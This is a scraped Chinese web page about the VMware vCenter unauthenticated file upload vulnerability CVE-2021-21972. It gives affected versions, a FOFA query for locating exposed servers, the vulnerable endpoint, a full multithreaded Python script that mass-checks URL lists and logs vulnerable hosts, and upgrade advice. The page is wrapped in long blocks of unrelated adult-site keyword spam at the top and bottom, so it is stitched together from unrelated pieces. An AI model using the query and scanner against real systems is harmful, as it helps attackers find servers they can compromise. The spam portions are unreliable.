婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識(shí)庫 > 關(guān)于Vmware vcenter未授權(quán)任意文件上傳漏洞(CVE-2021-21972)的問題

關(guān)于Vmware vcenter未授權(quán)任意文件上傳漏洞(CVE-2021-21972)的問題

熱門標(biāo)簽:南充電銷外呼系統(tǒng) 株洲電銷 南昌外呼系統(tǒng)定制 陜西辦理400電話 信陽電銷外呼系統(tǒng)怎么樣 貴陽網(wǎng)絡(luò)外呼系統(tǒng)軟件 宿州外呼系統(tǒng)公司 海外工廠地圖標(biāo)注 地圖標(biāo)注小程序

背景

CVE-2021-21972 vmware vcenter的一個(gè)未授權(quán)的命令執(zhí)行漏洞。該漏洞可以上傳一個(gè)webshell至vcenter服務(wù)器的任意位置,然后執(zhí)行webshell即可。

影響版本

vmware:esxi:7.0/6.7/6.5
vmware:vcenter_server:7.0/6.7/6.5

漏洞復(fù)現(xiàn) fofa查詢

語法:title="+ ID_VC_Welcome +"

POC

https://x.x.x.x/ui/vropspluginui/rest/services/uploadova

使用https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC腳本批量驗(yàn)證

#-*- coding:utf-8 -*-
banner = """
    888888ba       dP           
    88  `8b      88           
    a88aaaa8P' .d8888b. d8888P .d8888b. dP  dP 
    88  `8b. 88' `88  88  Y8ooooo. 88  88 
    88  .88 88. .88  88     88 88. .88 
    88888888P `88888P8  dP  `88888P' `88888P' 
  ooooooooooooooooooooooooooooooooooooooooooooooooooooo 
        @time:2021/02/24 CVE-2021-21972.py
        C0de by NebulabdSec - @batsu         
 """
print(banner)

import threadpool
import random
import requests
import argparse
import http.client
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"

def get_ua():
  first_num = random.randint(55, 62)
  third_num = random.randint(0, 3200)
  fourth_num = random.randint(0, 140)
  os_type = [
    '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
    '(Macintosh; Intel Mac OS X 10_12_6)'
  ]
  chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

  ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
          '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
         )
  return ua

def CVE_2021_21972(url):
  proxies = {"scoks5": "http://127.0.0.1:1081"}
  headers = {
    'User-Agent': get_ua(),
    "Content-Type": "application/x-www-form-urlencoded"
  }
  targetUrl = url + TARGET_URI
  try:
    res = requests.get(targetUrl,
              headers=headers,
              timeout=15,
              verify=False,
              proxies=proxies)
              # proxies={'socks5': 'http://127.0.0.1:1081'})
    # print(len(res.text))
    if res.status_code == 405:
      print("[+] URL:{}--------存在CVE-2021-21972漏洞".format(url))
      # print("[+] Command success result: " + res.text + "\n")
      with open("存在漏洞地址.txt", 'a') as fw:
        fw.write(url + '\n')
    else:
      print("[-] " + url + " 沒有發(fā)現(xiàn)CVE-2021-21972漏洞.\n")
  # except Exception as e:
  #   print(e)
  except:
    print("[-] " + url + " Request ERROR.\n")
def multithreading(filename, pools=5):
  works = []
  with open(filename, "r") as f:
    for i in f:
      func_params = [i.rstrip("\n")]
      # func_params = [i] + [cmd]
      works.append((func_params, None))
  pool = threadpool.ThreadPool(pools)
  reqs = threadpool.makeRequests(CVE_2021_21972, works)
  [pool.putRequest(req) for req in reqs]
  pool.wait()

def main():
  parser = argparse.ArgumentParser()
  parser.add_argument("-u",
            "--url",
            help="Target URL; Example:http://ip:port")
  parser.add_argument("-f",
            "--file",
            help="Url File; Example:url.txt")
  # parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
  args = parser.parse_args()
  url = args.url
  # cmd = args.cmd
  file_path = args.file
  if url != None and file_path ==None:
    CVE_2021_21972(url)
  elif url == None and file_path != None:
    multithreading(file_path, 10) # 默認(rèn)15線程

if __name__ == "__main__":
  main()

EXP 修復(fù)建議

vCenter Server7.0版本升級(jí)到7.0.U1c
vCenter Server6.7版本升級(jí)到6.7.U3l
vCenter Server6.5版本升級(jí)到6.5 U3n

到此這篇關(guān)于關(guān)于Vmware vcenter未授權(quán)任意文件上傳漏洞(CVE-2021-21972)的問題的文章就介紹到這了,更多相關(guān)Vmware vcenter上傳漏洞內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

標(biāo)簽:石嘴山 三明 開封 鄭州 汕頭 拉薩 玉林 晉城

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《關(guān)于Vmware vcenter未授權(quán)任意文件上傳漏洞(CVE-2021-21972)的問題》,本文關(guān)鍵詞  關(guān)于,Vmware,vcenter,未,授權(quán),;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《關(guān)于Vmware vcenter未授權(quán)任意文件上傳漏洞(CVE-2021-21972)的問題》相關(guān)的同類信息!
  • 本頁收集關(guān)于關(guān)于Vmware vcenter未授權(quán)任意文件上傳漏洞(CVE-2021-21972)的問題的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    欧美日韩一区三区四区| 欧美日韩美女一区二区| 色94色欧美sute亚洲线路二| 日韩一区二区不卡| 综合激情网...| 久久国产精品99久久久久久老狼 | 久久免费电影网| 亚洲综合一二三区| 成人久久久精品乱码一区二区三区| 欧美日韩一二三| 亚洲日本乱码在线观看| 成人午夜在线播放| 久久久高清一区二区三区| 青青青爽久久午夜综合久久午夜| 欧美自拍偷拍午夜视频| 一色桃子久久精品亚洲| 国产传媒一区在线| 欧美日本一区二区在线观看| 国产夫妻精品视频| 精品播放一区二区| 91亚洲国产成人精品一区二三| 亚洲一区二区视频在线观看| 欧美大片拔萝卜| www.日韩av| 日本伊人色综合网| 中文字幕欧美区| 欧美区视频在线观看| 国产大片一区二区| 美女网站一区二区| 香港成人在线视频| 日本一区二区三区视频视频| 精品国产成人在线影院| 欧美在线综合视频| 欧美午夜不卡在线观看免费| 亚洲国产日韩精品| 日韩欧美中文字幕精品| 麻豆成人av在线| 欧美久久久久久久久| 成人黄色大片在线观看| 亚洲成人自拍偷拍| 强制捆绑调教一区二区| 欧美精品乱码久久久久久| 亚洲综合激情另类小说区| 高清在线成人网| 国产精品美女久久久久久久久久久| 高清日韩电视剧大全免费| 欧美国产视频在线| 26uuu精品一区二区三区四区在线| 日韩影院免费视频| 日韩欧美国产三级| 粉嫩av一区二区三区在线播放| 亚洲天堂免费在线观看视频| 欧美中文字幕一区| 麻豆成人久久精品二区三区小说| 久久久久久久久久久久久女国产乱| gogo大胆日本视频一区| 亚洲综合清纯丝袜自拍| 欧美一级理论片| 成人精品视频一区二区三区| 亚洲一区二区影院| 精品福利视频一区二区三区| av电影在线不卡| 麻豆精品国产传媒mv男同| 久久精品亚洲精品国产欧美kt∨| 99re成人精品视频| 久久成人av少妇免费| 中文字幕一区二区三区四区 | 午夜激情一区二区三区| 久久久久久夜精品精品免费| 91蜜桃传媒精品久久久一区二区| 日韩电影在线观看一区| 亚洲国产精品成人久久综合一区| 欧美又粗又大又爽| 盗摄精品av一区二区三区| 日韩制服丝袜先锋影音| 中文字幕亚洲区| 精品久久久久久最新网址| 色94色欧美sute亚洲线路二| 国产一区二区电影| 五月婷婷欧美视频| 亚洲人精品午夜| 国产偷v国产偷v亚洲高清| 制服丝袜日韩国产| 色综合久久久久网| 国产大陆a不卡| 麻豆精品在线观看| 亚洲国产日产av| 最新久久zyz资源站| 久久久精品免费观看| 91精品国产综合久久精品图片| 99麻豆久久久国产精品免费 | 7878成人国产在线观看| 91麻豆视频网站| 成人avav影音| 福利电影一区二区三区| 精品一区二区在线免费观看| 五月天久久比比资源色| 亚洲一区二区在线免费观看视频| 亚洲三级在线看| 中文字幕一区二区在线观看| 久久老女人爱爱| 久久久欧美精品sm网站| 精品久久99ma| 日韩欧美中文一区二区| 日韩亚洲国产中文字幕欧美| 欧美裸体一区二区三区| 在线观看成人小视频| 在线中文字幕一区二区| 在线这里只有精品| 色女孩综合影院| 色婷婷av一区二区三区之一色屋| 成人sese在线| 91在线国产福利| av午夜一区麻豆| 色琪琪一区二区三区亚洲区| 欧美系列一区二区| 欧美日韩在线免费视频| 7777女厕盗摄久久久| 欧美一二三区精品| 欧美成人vr18sexvr| 精品久久久久久综合日本欧美| 精品久久久久久无| 久久综合九色综合97婷婷女人 | 久久99国产精品久久99果冻传媒| 蜜臀av性久久久久蜜臀aⅴ| 热久久国产精品| 久久er精品视频| 国产福利一区二区三区视频在线| 国产寡妇亲子伦一区二区| 成人白浆超碰人人人人| 91传媒视频在线播放| 日韩视频一区二区在线观看| 精品国产伦一区二区三区免费| 国产片一区二区三区| 亚洲丝袜精品丝袜在线| 午夜精彩视频在线观看不卡| 韩国av一区二区| 色综合久久九月婷婷色综合| 欧美片网站yy| 国产午夜一区二区三区| 亚洲人精品午夜| 九九在线精品视频| 91美女视频网站| 日韩欧美一区在线| 综合激情成人伊人| 久久99国产精品成人| 91视频.com| 精品国产不卡一区二区三区| 国产精品免费aⅴ片在线观看| 偷拍与自拍一区| 岛国av在线一区| 91精品蜜臀在线一区尤物| 国产精品私人影院| 日韩精品91亚洲二区在线观看| 国产很黄免费观看久久| 欧美麻豆精品久久久久久| 国产精品美女久久久久aⅴ国产馆| 午夜欧美在线一二页| 国产成人免费视频网站| 91.麻豆视频| 亚洲卡通欧美制服中文| 国产精品99久久久| 日韩一区二区中文字幕| 亚洲国产色一区| voyeur盗摄精品| 2024国产精品视频| 日韩黄色在线观看| 91免费精品国自产拍在线不卡| 欧美精品一区二区三区蜜臀| 午夜精品爽啪视频| 一本一本大道香蕉久在线精品| 久久久久99精品国产片| 日韩精品一二区| 欧美人伦禁忌dvd放荡欲情| 亚洲三级视频在线观看| 成人app网站| 中文字幕精品一区二区三区精品| 男男视频亚洲欧美| 欧美喷水一区二区| 亚洲午夜电影在线观看| 色视频欧美一区二区三区| 亚洲天堂免费在线观看视频| 不卡欧美aaaaa| 国产精品久久久久久久久果冻传媒| 精品一区二区三区影院在线午夜| 欧美精品色综合| 亚洲国产精品久久艾草纯爱| 日本道色综合久久| 亚洲综合视频在线| 色香蕉成人二区免费| 国产精品电影一区二区| 9久草视频在线视频精品| 中文字幕不卡的av| a在线欧美一区| 亚洲精品国产精华液| 欧美天天综合网| 午夜精品福利一区二区三区蜜桃| 欧美日产在线观看| 久久精品国产精品青草| 久久先锋影音av|